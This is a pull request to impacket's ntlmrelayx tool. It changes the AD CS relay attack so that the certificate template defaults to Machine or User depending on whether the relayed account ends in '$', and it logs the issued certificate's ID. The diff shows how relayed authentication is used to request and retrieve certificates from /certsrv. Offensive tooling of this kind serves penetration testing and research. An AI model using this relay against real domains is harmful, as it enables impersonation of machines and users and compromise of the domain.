### PR TITLE
Default ADCS template to "Machine" or "User" whether relayed account name ends with "$"

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -325,7 +325,7 @@ if __name__ == '__main__':
     # AD CS options
     adcsoptions = parser.add_argument_group("AD CS attack options")
     adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack')
-    adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, default="Machine", help='AD CS template. If you are attacking Domain Controller or other windows server machine, default value should be suitable.')
+    adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, help='AD CS template. Defaults to Machine or User whether relayed account name ends with `$`. Relaying a DC should require specifying `DomainController`')
 
     try:
        options = parser.parse_args()

--- a/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
@@ -33,14 +33,15 @@ class ADCSAttack:
             LOG.info('Skipping user %s since attack was already performed' % self.username)
             return
 
-        if self.config.template is None:
-            self.config.template = "Machine" if self.username.endswith("$") else "User"
+        current_template = self.config.template
+        if current_template is None:
+            current_template = "Machine" if self.username.endswith("$") else "User"
 
         csr = self.generate_csr(key, self.username)
         csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
         LOG.info("CSR generated!")
 
-        data = "Mode=newreq&CertRequest=%s&CertAttrib=CertificateTemplate:%s&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=" % (csr, self.config.template)
+        data = "Mode=newreq&CertRequest=%s&CertAttrib=CertificateTemplate:%s&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=" % (csr, current_template)
 
         headers = {
             "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",

--- a/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
@@ -32,6 +32,10 @@ class ADCSAttack:
         if self.username in ELEVATED:
             LOG.info('Skipping user %s since attack was already performed' % self.username)
             return
+
+        if self.config.template is None:
+            self.config.template = "Machine" if self.username.endswith("$") else "User"
+
         csr = self.generate_csr(key, self.username)
         csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
         LOG.info("CSR generated!")
@@ -65,7 +69,7 @@ class ADCSAttack:
         self.client.request("GET", "/certsrv/certnew.cer?ReqID=" + certificate_id)
         response = self.client.getresponse()
 
-        LOG.info("GOT CERTIFICATE!")
+        LOG.info("GOT CERTIFICATE! ID %s" % certificate_id)
         certificate = response.read().decode()
 
         certificate_store = self.generate_pfx(key, certificate)


### PR DESCRIPTION
For convenience, and also because we might not know what type of account we're going to relay.
Passing a specific template is still supported.

Also, output the ID of the generated certificate, for easier identification.